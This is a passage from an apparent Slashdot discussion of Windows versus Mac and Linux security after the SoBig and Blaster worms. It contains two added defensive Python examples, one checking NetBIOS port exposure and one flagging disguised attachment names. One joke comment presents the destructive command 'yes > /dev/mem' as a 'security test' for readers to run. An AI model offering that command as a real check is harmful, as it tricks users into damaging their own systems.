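netstat-style listing for the NetBIOS ports the comment above names
(137, 138, 139) and report which of them are reachable through an
internet-facing interface. Interface roles and the sample output are
constructed for the example."""
import re
from typing import Dict, List, Tuple

# NetBIOS over TCP/IP: name service, datagram service, session service.
NETBIOS_PORTS = {137, 138, 139}

# Constructed: which local address belongs to which kind of interface.
# 203.0.113.0/24 is a documentation range, so nothing here is a real host.
INTERFACE_ROLES: Dict[str, str] = {
    "203.0.113.10": "internet",  # the dial-up / DSL side
    "192.168.1.5": "lan",        # the home LAN side
}

# Constructed sample in the layout of "netstat -an" on Windows.
SAMPLE_NETSTAT = """\
Proto  Local Address          Foreign Address        State
TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
TCP    192.168.1.5:1026       192.168.1.9:139        ESTABLISHED
UDP    203.0.113.10:137       *:*
UDP    192.168.1.5:138        *:*
"""

Listener = Tuple[str, str, int]  # (proto, local address, local port)

LINE_RE = re.compile(r"^(TCP|UDP)\s+(\S+):(\d+)\s+\S+(?:\s+(\S+))?\s*$")


def parse_listeners(text: str) -> List[Listener]:
    """Sockets that will accept traffic: TCP only in LISTENING state,
    UDP always (there is no state column for UDP)."""
    found: List[Listener] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # header or unrelated line
        proto, addr, port, state = m.group(1), m.group(2), int(m.group(3)), m.group(4)
        if proto == "TCP" and state != "LISTENING":
            continue
        found.append((proto, addr, port))
    return found


def reachable_from_internet(addr: str) -> bool:
    """A wildcard bind answers on every interface, so it counts as exposed;
    otherwise only a bind to the internet-facing address does."""
    if addr in ("0.0.0.0", "::"):
        return True
    return INTERFACE_ROLES.get(addr) == "internet"


def exposed_netbios(text: str) -> List[Listener]:
    """NetBIOS listeners a remote host on the internet side could reach."""
    return [s for s in parse_listeners(text)
            if s[2] in NETBIOS_PORTS and reachable_from_internet(s[1])]


def report(text: str) -> List[str]:
    """One line of advice per finding, in the spirit of the comment above:
    close the port unless file sharing is on, and never on the internet side."""
    lines = []
    for proto, addr, port in exposed_netbios(text):
        where = "all interfaces" if addr in ("0.0.0.0", "::") else addr
        lines.append(f"{proto}/{port} listening on {where}: "
                     "block on the internet-facing interface, or disable "
                     "NetBIOS over TCP/IP if file sharing is not needed")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_NETSTAT) or ["no exposed NetBIOS listeners"]:
        print(line)
```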
    3. Re:Good point, muddled way of expressing it by PygmySurfer · · Score: 5, Informative

      XP's firewall is off by default and takes at least five steps to turn on

      I seem to recall XP's firewall being turned on during the initial "Welcome to Windows" wizard that pops up after installation, if you choose the option "This machine will be directly connected to the internet" (Or something like that).

      That being said, I always turned the firewall OFF, it was too much of a pain to set up additional ports to allow.

      Since then, I've moved to a Mac, and OS X's firewall is much easier to configure.

      I certainly agree with the rest of your points though (and the majority of the article).

    4. Re:Good point, muddled way of expressing it by El · · Score: 2, Interesting
      It's reprehensible that Microsoft apparently didn't have security (a broad term, but the literature to define it is out there) as a guiding design principle when they designed Windows

      You're assuming that Windows was designed, and didn't just evolve from a quick and dirty rip-off of CP/M by adding more and more Unix-like features. I have a favorite saying: "Anything that's backwards compatible with a kluge is, by definition, a kluge." Remember, supporting multiple users was an afterthought for Windows!

      --

      "Freedom means freedom for everybody" -- Dick Cheney

    5. Re:Good point, muddled way of expressing it by dhogaza · · Score: 5, Insightful

      Do keep in mind that at major papers like the Post reporters don't write the headlines. Just as they don't decide where their story will run (or if it will run), how big the type used for the head will be, whether or not there will be a subhead, etc.

      So don't ding the reporter for the slightly misleading headline. Sounds like the reporter got it right in the part he or she wrote - the article.

    6. Re:Good point, muddled way of expressing it by hankaholic · · Score: 5, Insightful

      Fair enough, but many people may opt not to download updates because of their ridiculous size.

      Under Debian, at least, if a package is found to have a security hole, I have several options.

      I can download only the affected package. Of course, since it's Debian, I can always opt to just bring the whole system up to date. If bandwidth is really a problem, I can even manually rsync an older local copy of the package against the updated version upstream.

      Unfortunately, rsync isn't done by apt-get automatically, but the option to do it manually is there, as many Debian mirrors do support rsync.

      The point is, though, that with Linux and the BSDs, you can find out exactly what you're downloading, and determine exactly what effect the new package will have. With XP, you might have no idea what you're getting. Spending eight hours downloading MS updates when you don't know what you're getting isn't something most people consider worthwhile, especially when it's often the case that after updating Windows, it's found that there have been refinements to the updates that just occurred, and so Windows wants to download yet more stuff, and reboot yet again!

      People want to use their systems, not maintain them. As long as the MS "critical updates" take ages to download and often create the need for further updates, people will continue to ignore the "Windows updates are available" messages.

      Rebooting is a lot to ask. Large downloads are a lot to ask. If I were to install all of the "important" updates available to Windows at the moment, it would require several reboots, especially since many components can't be installed at the same time. Under Debian, not even one reboot would be required, unless the kernel were updated. Under Windows, if I update Media Player, a reboot is required, and Windows won't even let me update other things at the same time!

      I'm just glad I'm behind a firewall.

      --
      Somebody get that guy an ambulance!
    7. Re:Good point, muddled way of expressing it by 1010011010 · · Score: 5, Insightful


      Well, he could have mentioned a true "Insecure by Design" flaw in Windows: the fact that Windows determines that a file is executable based on its *name*. If a file ends in .exe, .vbs, .bat, .scr, or one of lots of other extensions, Windows assumes it's executable and will load and run it when the user clicks on it. Or a "shell" command references it, etc.

      On Unix and unix-like systems, one has to explicitly mark a file as executable before the OS will try to run it, and it's even possible to deny the "execute" permission to an entire filesystem (for instance, users' read-write home directories).

      --
      Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
    8. Re:Good point, muddled way of expressing it by rekkanoryo · · Score: 2, Insightful
      Microsoft already bought an antivirus maker a few months back. Read about it here.

      I think Microsoft would find itself in an indefensible position were it to integrate a feature such as antivirus directly into Windows. That would be using monopoly powers to stifle competition, and I think DOJ would throw a fit over it. Many OEMs already bundle antivirus software. HP and Compaq bundle both Norton and McAfee, I seem to recall Dell bundling Norton, and I know eMachines bundles McAfee (not installed by default, though).

    9. Re:Good point, muddled way of expressing it by rabidcow · · Score: 2, Informative

      If a file ends in .exe, .vbs, .bat, .scr, or one of lots of other extensions, Windows assumes it's executable and will load and run it when the user clicks on it. Or a "shell" command references it, etc.

      Not only that, it goes and hides that part of the name by default, so most people won't get a warning that the file will be executed.

      it's even possible to deny the "execute" permission to an entire filesystem

      You can actually deny execute permission on a drive (or any file/folder) in Windows as well, but since that's shared with folder traversal it may not be feasible. (and I doubt that's available in "Home" editions...) It might work if you go and enable it for all folders specifically (and not their content), but that would get extremely tedious.

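The two posts above describe the same design choice from two sides: Windows decides that a file is a program from its name alone, and Explorer then hides that part of the name by default. This added example (not code from the thread or any poster) shows how a mail filter could flag the resulting disguise, and contrasts it with the Unix mode-bit check. The extension list is the one the posts name; the "hide known extensions" model is simplified to hiding the final extension of every name.

```python
"""Added example, not from the thread or any quoted post: flag attachment
names that Windows would run by name, detect the double-extension disguise
that hidden extensions produce, and contrast with the Unix mode-bit test.
The extension list and the display model are simplifications for the
example; Windows' real list of run-by-name extensions is longer."""
import os
import stat
import tempfile
from typing import Optional, Tuple

# Extensions the thread names as "executable by name" on Windows.
EXECUTABLE_EXTENSIONS = {".exe", ".vbs", ".bat", ".scr", ".pif"}


def windows_executable_by_name(filename: str) -> bool:
    """Windows consults only the final extension, never the file's contents
    or a permission bit."""
    return os.path.splitext(filename)[1].lower() in EXECUTABLE_EXTENSIONS


def displayed_name(filename: str, hide_known_extensions: bool = True) -> str:
    """Name as the file browser shows it with known extensions hidden:
    the last extension disappears, so 'invoice.pdf.scr' reads 'invoice.pdf'.
    (Simplification: every extension is treated as a known type.)"""
    if not hide_known_extensions:
        return filename
    base, ext = os.path.splitext(filename)
    return base if ext else filename


def disguised_executable(filename: str) -> Optional[str]:
    """If the file runs by name but the user would see a harmless-looking
    name with its own document extension, return that misleading name."""
    if not windows_executable_by_name(filename):
        return None
    shown = displayed_name(filename)
    inner_ext = os.path.splitext(shown)[1].lower()
    if inner_ext and inner_ext not in EXECUTABLE_EXTENSIONS:
        return shown
    return None


def mail_gateway_decision(filename: str) -> str:
    """Policy an inbound mail filter could apply from the attachment name."""
    shown = disguised_executable(filename)
    if shown:
        return f"block: executable disguised as {shown}"
    if windows_executable_by_name(filename):
        return "quarantine: executable attachment"
    return "allow"


def unix_executable(path: str) -> bool:
    """Unix asks the mode bits, not the name. A noexec mount, as the posts
    mention for home directories, would refuse even a file with these bits."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def unix_mode_bit_demo() -> Tuple[bool, bool]:
    """Create a file whose name ends in .exe: it is not executable on Unix
    until someone explicitly sets the bit. Returns (before, after)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "attachment.exe")
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho constructed sample\n")
        before = unix_executable(path)
        os.chmod(path, 0o755)
        after = unix_executable(path)
    return before, after


if __name__ == "__main__":
    for name in ("notes.txt", "tool.exe", "invoice.pdf.scr", "photo.jpg.pif"):
        print(f"{name:18} shown as {displayed_name(name):14} -> {mail_gateway_decision(name)}")
    print("unix executable before/after chmod:", unix_mode_bit_demo())
```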
  3. Unless... by Chemical+Serenity · · Score: 5, Funny
    ... you count the *nix administrators who had to scramble to put in antivirus software on the corporate mail server to stem the tide of 50k+ virus mails per day.

    On the plus side, if you work as a contractor, it's billable hours. :D GG SoBillable^H^H^H^H^H^H^HSoBig!

    --
    "People will pay big bucks for the luxury of ignorance."
  4. 95% a target perhaps? by koniosis · · Score: 2, Insightful

    Funny how 95% of PC users have Windows, I wonder why a Virus writer would want to target Windows??!? Perhaps that is why so many exploits are found, because people are targeting it religiously, start targeting Mac and Linux as much and see who is insecure!

    --
    I spent ages trying to think of sig, but never did :(
    1. Re:95% a target perhaps? by Borg_5x8 · · Score: 3, Insightful

      Agreed. I'm not trolling, but one could argue that no one cares enough about macs or linux to target them with viruses. :P

    2. Re:95% a target perhaps? by Anonymous Coward · · Score: 5, Insightful

      what about web server worms? apache is much more used than iis, but this didn't help iis...

    3. Re:95% a target perhaps? by justsomebody · · Score: 5, Insightful

      Funny, you say that. That excuse is getting to its old age.

      But it makes a great difference (on Windows) right in a moment after you:
      step 1) Disable Internet connection for Explorer and Outlook (almost no virus can connect to the internet to download its other part or upgrade, because they mostly use the ActiveX download object)
      step 2) Start using Mozilla or Opera or even better Thunderbird and Firebird (in this step you disable IFrame and OCX viruses)
      step 3) Teach users not to open .pif and .vbs (Here you stop the user interaction needed for the virus to be downloaded)

      The problem with Windows is not the 95%, but that IE and Outlook are made a central part of the system, thus allowed any action no matter how stupid it is.

      Based on that: YES, Windows is insecure in its roots.

      --
      Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
    4. Re:95% a target perhaps? by Liselle · · Score: 4, Insightful

      Give me a break. Linux (and Mac) don't have a huge share of desktops, but more and more companies (the kind of companies you want to hack and steal credit card numbers from) are running Linux-based servers. The source code for Linux is on millions of computers, naked to the world.

      I learned about preventing buffer-overruns when I was in high school. This "most computers are running Windows" excuse for viruses is a cop-out, plain and simple.

      --
      Auto-reply to ACs: "Truly, you have a dizzying intellect."
    5. Re:95% a target perhaps? by Anonymous Coward · · Score: 2, Insightful

      Mac and Linux users tend not to use Outlook for reading mail, they also tend not to run as root. Of those 95% Windows users, how many read html mail with scripting enabled while logged into the admin account? It's Microsoft's fault because they are targeting people who know nothing about computers and shipping an insecure default configuration.

    6. Re:95% a target perhaps? by evn · · Score: 4, Insightful

      The size of the windows audience has something to do with the sheer number of viruses & worms, but that doesn't mean that BSD/Mac OS/Linux are automatically just as insecure as Windows. Microsoft hasn't exactly gone out of its way to ensure that users are safe and secure (not to the extent that OpenBSD has anyway)

      Furthermore, *NIX has a massive presence in the server closets of the world. A worm or virus that exploited these systems could be very lucrative for a malicious individual.
      - Stealing corporate data (so we could find out who exactly SCO buys the stuff McBride is smoking from)
      - DDoS attacks with OC-3 (rather than DSL/Dialup/Cable)
      - Spam directly from the mail servers

      There are certainly good reasons to write *NIX worms/viruses, but I think a combination of clueful administration, a well designed OS, and (to a smaller extent) obscurity work together to make them a particularly hard target (when compared with Windows)

    7. Re:95% a target perhaps? by lpret · · Score: 4, Insightful
      I think this has to do more with the type of user we are talking about here. Joe Sixpack doesn't know anything about computers and thus uses Windows. Then we blame him when his computer has a worm. Well, if JS used Linux he wouldn't update his system either.

      The only way to get everyone patched (more so than the auto-download and ready to install of Windows) is to force everyone to patch. However, there would be several dupes on slashdot about how our rights are being taken away and how Microsoft can look into our computer. A step further, if people started using Linux, you might see the same thing with Linux...

      --
      This is my digital signature. 10011011001
    8. Re:95% a target perhaps? by koniosis · · Score: 2, Insightful

      It's not Microsoft's fault; in XP when you install, the first thing it does is set up an Admin account, then ask you to set up "User" accounts which should be used in place of admin. The only problem is that users who run Windows generally don't care for security, and so don't care about whether they're an admin or not.

      --
      I spent ages trying to think of sig, but never did :(
    9. Re:95% a target perhaps? by bl4ckfly · · Score: 2, Insightful

      Agreed as well.

      Obviously, Windows is the number one OS in the world, thus the number one target by the blackhat community. There are plenty of ways to exploit Linux and other Unix systems, but what is the point? The best OS to corrupt is the one used by the most people. If someone writes a great worm that trashes Entourage on Mac OS X, great. The less than 5 percent of the computing world will be in pain for a bit, but that is not the point of security exploits. People want to cause world wide corruption, so Windows is the obvious target.

    10. Re:95% a target perhaps? by deputydink · · Score: 5, Informative

      Funny how 95% of PC users have Windows, I wonder why a Virus writer would want to target Windows??!? Perhaps that is why so many exploits are found, because people are targeting it religiously, start targeting Mac and Linux as much and see who is insecure

      Actually, virus writers write virii targeting windows machines because windows machines are easy targets, not because there are so many licenses sold.

      According to Netcraft's site survey only a quarter of active sites run Windows, leaving the bulk of the public internet running on *nix.

      I suspect much of the 95% of PCs you speak of are safely walled up in institutions', schools' and corporations' private networks, which are generally out of scope for a worm like blaster to target.

      Now koniosis, what should impress you is that *nixes run the majority of public sites on the internet (those sites most easily attacked, I might add) with a marked minority of serious compromises as compared to Windows. More sites, less bugs. Simple.

      Finally, only a Microsoft employee could think that it's justified that the amount of embarrassing code compromises grow proportionally to desktop marketshare.

    11. Re:95% a target perhaps? by Borg_5x8 · · Score: 2, Insightful

      Rob, save the moderators time and add the option "-1, unbiased view of Microsoft" -_-

    12. Re:95% a target perhaps? by koniosis · · Score: 2

      Trolling and Flamebait are what you get if you make any kind of Windows Defence on ./ or balanced view, shame really.

      --
      I spent ages trying to think of sig, but never did :(
    13. Re:95% a target perhaps? by justsomebody · · Score: 2, Informative

      C'mon, get a reality check.

      decent firewall script
      For a common user, redhat-config-securitylevel or menu Applications - System Settings - Security Level (enter administrator password) Choose between No, Normal, Maximum. Normal has proven to be sufficient for average users

      download the latest patched kernel
      Click the red asterisk that's blinking in your left corner. Click Launch up2date (enter administrator password) - Next - Next - Finish

      In linux you have far more control over the system and can do far more damaging things, as its less restrictive than windows
      Yes, I agree, but only when I'm root. When I'm using my user account the system is far better protected. Again, users don't need to know what a console is.

      so you can't say windows doesn't stop users being stupid because linux doesn't make an effort to either
      Actually it does, if you read what I answered

      To protect yourself from posting stupidity, try running the system before you wanna join the critics.

      And yes, there is a major difference

      When you set up Windows you start as Administrator. Most people even without password. The first user that you create is still administrator and again there is a possibility to have no password

      When you set up linux, you MUST enter an administrative password that can't be blank, but redhat starts the firstboot script on first login. Here you MUST enter your username and password, by the way, default password length is 6 characters

      By the way I'm available to your next comments

      --
      Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
    14. Re:95% a target perhaps? by agent+dero · · Score: 2, Interesting

      This is _sort of_ true

      If you recall the days of 68K macintosh, and Windows 3.11, there were quite a few macintosh virii.

      Market share has gone down, while the emotions towards the OS have changed.

      A much much larger percentage of Windows users _hate_ Windows, while more mac users love macs, that's why they chipped out for them.

      --
      Error 407 - No creative sig found
  5. In a sense, it's true by Anonymous Coward · · Score: 5, Insightful

    The old DOS/Windows had security as a pretty secondary concern, it was just about getting things to run and not crash a lot of the time. NT/2K/XP is much improved, but it still suffers from this legacy. For example, it's still difficult to run users in non-Admin roles because some applications expect the user to have full Admin rights. Only when most of these applications are updated will the ability to use real user security settings become practical.

    1. Re:In a sense, it's true by manly_15 · · Score: 3, Interesting

      If every software maker followed these Microsoft specifications Windows would be a much better operating system. A good example of a broken app is Palm Desktop. First of all, it only works with one user. Second, to install it, you have to give the limited user admin rights, install it, and bring them back down to limited rights. It's the same for Documents To Go. Talk about a PITA - and notice that neither of the apps boxes have the Windows logo on them.

    2. Re:In a sense, it's true by iCEBaLM · · Score: 2, Insightful

      My point is, don't dog on Palm for creating a program to MS spec years ago and not wanting to "update" because MS changed the spec and they don't want to lose all their third party vendor support.

  6. Quick linux security test. by Anonymous Coward · · Score: 5, Funny
    To test if your linux box is secure, press alt f2 to open up the run dialog, then type
    yes > /dev/mem

    If nothing happens then you have a reasonably secure linux box.
    1. Re:Quick linux security test. by Negative+Response · · Score: 5, Insightful
      I just did it and the result is:
      zsh: permission denied: /dev/mem

      You know, being funny aside, you just demonstrated one excellent point: Users should have enough rights to have work done, but not so much to easily screw up the system. Don't use root privilege in vain!

    2. Re:Quick linux security test. by donnz · · Score: 3, Insightful

      Oh, ha, yes, funny.

      Now connect your Windows PC to the internet and wait for someone in Kathmandu to type "format c:".

      The real issue however is that Windows * is still using a lot of code from DOS and Win3.1 for all sorts of shit. Those were the days, remember, when personal computers were just that, personal.

      *nix has a pedigree in networked computers. So whilst mistakes are made in code of each system, always, one paradigm is always going to be more secure than the other. Until MS really, really and truly re-writes its OS. Shame the article misses this point by such a wide mile.

      --
      -- Free software on every PC on every desk
    3. Re:Quick linux security test. by 1010011010 · · Score: 3, Informative


      I did an strace of a (brand new, designed-for-XP) program on Windows XP recently. The program changes the mouse cursor when you mouse over certain UI features. According to strace, Windows XP uses WOW (windows-on-windows -- Win16 emulation!) to do this. To this day. In their latest operating system release. Sheesh. The Win32 call thunks down to Win16 emulation, even on XP. How busted is that.

      Plus, windows thinks that just because a file's name ends in ".exe" or some other magical combination of letters, that it's a program and should be loaded and run. Over here on my Linux systems, I can deny execute permission to entire filesystems (such as users' home directories), and in any case, Linux doesn't assign every random attachment and download execute permission by default.

      --
      Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
    4. Re:Quick linux security test. by Nakoruru · · Score: 2, Informative

      Windows also allows you to deny execute permission to entire filesystems. It allows much more fine grained control than unix.

      The latest version of Microsoft Outlook can be set up so it doesn't even allow me to save an 'unsafe attachment', much less run it. I have to hack around in the registry to re-enable it, or ask the sender to resend it in a zip file.

  7. Choice by Spleener12 · · Score: 3, Informative
    I have one question: If you don't trust this company, why did you give it your money?

    In my case, because Virginia Tech's CS department requires us to have XP Pro. The people who don't trust MS use Windows because they have to.

    1. Re:Choice by Exitthree · · Score: 4, Insightful

      I'm really not trying to be a troll here, but if a CS department requires a specific type of operating system (and probably the software that runs on said OS) in order to teach, then it's probably not worth the money to attend. Sure, learning to program with Microsoft's code du jour might help in the short term, but nothing beats teaching fundamental computer science principles in the long term.

      What happens when the next big thing comes along and all the CS grads are stuck with C# as their sole reference point?

    2. Re:Choice by mjmalone · · Score: 4, Informative
      If you read the computer requirements for computer science majors you will see that they also require you to be able to run Mandrake Linux.

      In the FAQ they respond to the question "Do I have to use Windows XP Professional on my computer?"
      Certain assignments or software in some classes may require the use of Windows which is available in the Computer Science undergraduate labs. If you do not run Windows on your computer, you will miss an educational opportunity to learn Windows administration, which is a marketable skill. The Department will not check that you are, in fact, using Windows XP Professional. However, if you choose to run Windows 95 or 98, you will almost certainly experience increased difficulty in the programming classes.
      The requirement is more of a guideline for people who don't know what to get. And the original poster is probably just a karma whore who doesn't know what he/she is talking about.
  8. 'windows attacked because popular' by gl4ss · · Score: 5, Informative

    the author makes a nice (partial, if you may) rebuttal of this myth, and also points to something to back it up like the number of open ports that create potential possibilities for holes, and that are for services that are default enabled, yet shouldn't be used in a hostile environment (and how ms does nothing about it, and how xp was supposed to be more secure in matters like this). and frankly i haven't heard of a non-hostile environment involving more than 10 people in a deserted island with lots of food and jolly sunshine happiness to keep them away from their computers.

    --
    world was created 5 seconds before this post as it is.
    1. Re:'windows attacked because popular' by Darth_Burrito · · Score: 2, Informative

      I think there's a lot of very valid popularity related reasons that cause Microsoft to be subjected to a higher percentage of attacks per vendor than other systems.

      First, consider who Microsoft based systems are popular with: home and office users. Often, as in the case of SoBig, the users are as much a target as the operating system.

      Second, because Microsoft is so popular and because they have a history of problems (such as bluescreens), they have become extremely unpopular, particularly among that certain segment of the population that might create and unleash viruses. While I know of many corporations//organizations whose capacity for evil greatly exceeds Microsoft's (Monsanto, Phillip Morris, etc), I know of no company so hated by so many all over the world.

      Finally, when you consider the amount of viruses, worms, and the like that affect Microsoft versus a nix, it is important to remember that Microsoft is an entire homogonized platform in and of itself. The misc services, the ftp server, the smtp server, the web server, the database server, the mail server, etc are all made by Microsoft and many of these components are standard, especially in a microsoft shop. Compare this to a nix where people more readily pick and choose each of the above components. If you are writing a multi-vector worm like Nimda, windows represents the easiest target because there are a lot of standard uniformly implemented services which are virtually guaranteed to be there. If you were writing the same thing for a Nix, you could target Apache, sendmail maybe, and then what? There's so much diversity in the Nix world that it makes it more difficult to target.

      I am not excusing Microsoft's security problems in any way. I just believe that the popularity of Microsoft and its platforms has had an extremely significant effect on the number of times they are targeted, and as a result, compromised.

  9. This is a good first step. by JessLeah · · Score: 2, Insightful

    Perhaps now we should try to get other "mainstream" media entities to cover stories with this sort of angle... such as:

    * The New York Times
    * CNN
    * USA Today
    * The Wall Street Journal? (Yeah, it's a long shot, but...)

    Does anyone here have contacts with any of these companies?

    1. Re:This is a good first step. by JessLeah · · Score: 2, Insightful

      Listen, ANYTHING that speaks out against current prevailing trends is generally "news" to the majority of Americans. The trend in recent years is to "go with the flow" of the status quo; most people I talk to about Mac OS, Linux, etc. either (A) know nothing about them, or (B) think Windows is so much better (client-side and often server-side!) than both of them.

      Unless some press that runs contrary to this prevailing notion gets into mainstream companies...well, Windows will probably continue to be stuffed down everyone's throats by a majority of uninformed users and managers.

  10. Biased report! by lakeland · · Score: 3, Funny

    I wonder how much money RedHat slipped the Washington post for that one...? *g*

  11. Linux users by jabbadabbadoo · · Score: 5, Funny
    "But nobody with a Mac or a Linux PC has had to lose a moment of sleep "

    Like a Linux PC owner sleeps anyway....

    1. Re:Linux users by ceejayoz · · Score: 4, Funny

      They do sleep, they just sleep alone. ;-) joking, joking...

    2. Re:Linux users by ATMAvatar · · Score: 2, Funny

      Better to sleep alone than to get W32.STD :o

      --
      "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety."
  12. what about Gentoo? by Anonymous Coward · · Score: 3, Interesting

    "Windows is better than most operating systems at easing the drudgery of staying on top of patches and bug fixes"

    emerge -u world
    how _hard_ is that?

    1. Re:what about Gentoo? by rampant mac · · Score: 3, Insightful
      "Windows is better than most operating systems at easing the drudgery of staying on top of patches and bug fixes"

      emerge -u world how _hard_ is that?

      First off, I'm a Mac user but fairly experienced using Unix/Linux....

      The Mac is better than most operating systems at easing the drudgery of staying on top of patches and bug fixes...

      *clicks software update*

      Do you really expect newbie users of Linux to understand "emerge -u world" by chance? If so, there is MUCH work to be done to Linux's software update model. Sure the emerge command may seem trivial to most advanced Linux users, but what can be done to expand this simplicity towards the consumer market?

      --
      I like big butts and I cannot lie.
    2. Re:what about Gentoo? by boredMDer · · Score: 2, Interesting

      Do you really expect newbie users of Linux to understand "emerge -u world" by chance?

      If a user is using Gentoo, unless the system was, for example, installed for them, they have to and undoubtedly will know that 'emerge -u world' updates the system to all latest program versions, bugfixes, etc. One must use 'emerge' several times during the installation process alone much less to install any other software from ports after installation is completed.
      During installation 'emerge -u system' is run as well (or emerge -u system? I forget which...)

      Do you really expect newbie users of Linux to understand "emerge -u world" by chance? If so, there is MUCH work to be done to Linux's software update model. Sure the emerge command may seem trivial to most advanced Linux users, but what can be done to expand this simplicity towards the consumer market?

      You make it sound as if you think that 'emerge' is installed on all distros, where in fact it is used as the sole package manager in only one, Gentoo (portage can, however, be installed on other distros...see gentoo forums to see how). Again, a Gentoo user is essentially required to know how emerge works to use their system.

    3. Re:what about Gentoo? by Gilmoure · · Score: 2, Informative

      Hell, not only does OS X patch itself and Apple apps (Safari, iMovie, iTunes, etc.), it'll even patch Internet Explorer with a security patch. This is accomplished via a pop up window with a list of updates to install, check boxes next to each one, info buttons next to each one and a single install button. Nice being able to queue all the installs and set them d/l'ing and running. After doing a restart, if necessary, it'll check again, to see if there are more patches that are now needed.

      --
      I drank what? -- Socrates
  13. Corporate Blinders by N8F8 · · Score: 2, Insightful

    What baffles me is that even with all this evidence for the need for operating system diversity in the corporate realm both corporate America and the US government are eliminating anything non-Microsoft. Lemmings.

    What is it going to take? Ships sinking? Trains being derailed? Satellites dropping out of orbit?

    --
    "God fights on the side with the best artillery." - Napoleon, Marshal of France - speaking truth to power
    1. Re:Corporate Blinders by vacaboca · · Score: 5, Interesting

      "all this evidence for the need for operating system diversity in the corporate realm"...?

      That seems to be a rather easy thing to say if you're not actually trying to manage a business with a large, complex interconnected system of technologies... having spent a rather painful amount of time (actually, more like an amount of rather painful time) in very large companies (35000 PC users at all levels of use), I have to say that a desire for OS diversity is far from an obvious choice. I'm not saying it's a bad idea, just a potentially impractical one in many real corporate situations.

      Working with the single devil you know as opposed to a vast army of individually varied devils may be preferable, at least in theory.

    2. Re:Corporate Blinders by mjmalone · · Score: 4, Funny
      What is it going to take? Ships sinking? Trains being derailed? Satellites dropping out of orbit?
      Major power outages in the northeast!? Entire DMV operations being shutdown!? Massive denial of service attacks crippling the internet!? E-mail viruses bringing hundred-thousand-dollar mailservers to their knees!?
  14. Good idea by Rosco P. Coltrane · · Score: 5, Funny

    Here's a modest proposal: Microsoft should use some of its $49 billion hoard to mail an update CD to anybody who wants one. At $3 a pop (a liberal estimate), it could ship a disc to every human being on Earth -- and still have $30 billion in the bank.

    Please Microsoft, use CD-RWs. I already have a wall covered with silver AOL CDs ...

    --
    "A door is what a dog is perpetually on the wrong side of" - Ogden Nash
  15. Nah... by Faust7 · · Score: 4, Insightful

    Here's a modest proposal: Microsoft should use some of its $49 billion hoard to mail an update CD to anybody who wants one.

    The sorts of people that would think to order such a CD in the first place are likely already patching their machines. Others will get the CD and misplace it, forget about it entirely, or mistake it for something like an AOL disc and toss it in the trash.

  16. Re:Why was this posted? by Audity · · Score: 5, Interesting

    It was posted because people have been saying for a long time that windows is insecure, but Joe Shmoe computer user won't know that (you mean there's computers that don't run windows?) until it gets some attention in the mainstream media. This is the media attention a lot of linux geeks have been waiting for.

  17. Intelligence by sub7mage · · Score: 2, Insightful

    The only reason these worms can spread is because of the lack of basic computer intelligence of the average user. I have had Windows and used the internet religiously for years and have never gotten a worm on my box.

    So basically what I'm saying here is that it's not always the operating system's fault; even though I think Windows is insecure, it gets too much shit for it.

    --
    There are 10 kinds of people: those that understand binary code and those that don't
  18. Obligatory Question and by Anonymous Coward · · Score: 5, Insightful

    Obligatory Response:

    The argument sort of breaks down when you talk about webservers, with Apache solidly in front with % usage, yet it's the smaller-target MS offering that is the one hit with exploits.

    There's something more fundamental about the differences in security -- yes, MS is a bigger target, but that doesn't mean that it can't also happen to be the easiest target (and it is).

    1. Re:Obligatory Question and by Overly Critical Guy · · Score: 3, Insightful

      Windows still has 95+% marketshare. See how secure Linux is then.

      --
      "Sufferin' succotash."
  19. MS Bashing by mOoZik · · Score: 5, Insightful

    This is a bit unfair. Microsoft identified the problem and offered updates long before the worm hit the streets. Microsoft cares about the security of Windows, but it was the stupidity of the users which led to the compromise of their systems. If a Linux hole is found, nearly every user would update to fix the change, because the average user of Linux knows what putting it off may entail. The average Windows user does not have the same computer knowledge, and hence, Microsoft gets the blame. Just another MS bashing is what it is!

    1. Re:MS Bashing by cduffy · · Score: 5, Funny

      There're two issues:

      1. There's this bug users didn't patch for

      2. The system's default configuration made almost everyone vulnerable to being attacked via the bug, even if the user isn't actually making use of the buggy service.

      On item [1], yes, there's a really strong argument that it's the user's fault. On item [2], though, it's pretty damn clearly the vendor's negligence.

  20. Actually mac and linux users were affected by jdigriz · · Score: 5, Interesting

    Some of us alternative OS users were actually affected by the virus, even if we weren't infected. In addition to the Net slowdown, the friggin SoBig.f virus forges emails. So if you have any Windows-using acquaintances, or even people who received a forward with your address on it, the SoBig.f virus will cheerfully send out copies of itself purportedly from you! It doesn't just stop at the address book either, but allegedly scans documents on the drive to harvest addresses. Evil, evil thing. So, no computational loss, but potential harm to reputation; even though it's easy to prove via the headers that it did not originate from you, the vast majority of those Windows users who get infected with emails bearing your From: line don't know a header from a hole in the head.

  21. Larger Target by Raven-sama · · Score: 2, Insightful

    Linux and MacOS users are, let's face it, in the minority compared to Windows users. Granted Windows most likely does have more security flaws than these other OSes, but the main concern here is that virus writers will target the OS that will cause the most damage (or that they have the most experience with) and that will almost always be Windows.

    Even if all the known exploits in Windows were patched, all it would take is one more for another virus to do something like Blaster or Slammer. On the flipside though, something like that could just as easily happen to Linux if an exploit were found; it's just that no one bothers to write viruses that take advantage of it.

  22. Correct Me If I'm Wrong but.... by cmay · · Score: 2, Insightful

    If someone emails you an exe, and you run it, and it does something to your computer, that isn't exactly Microsoft's fault.

    I guess SoBig is a .pif and so it's kinda confusing to some people, but I don't think you can group SoBig in with other security holes that Microsoft has.

    1. Re:Correct Me If I'm Wrong but.... by Politburo · · Score: 4, Insightful

      Why are attachments allowed to do *anything* on the computer?

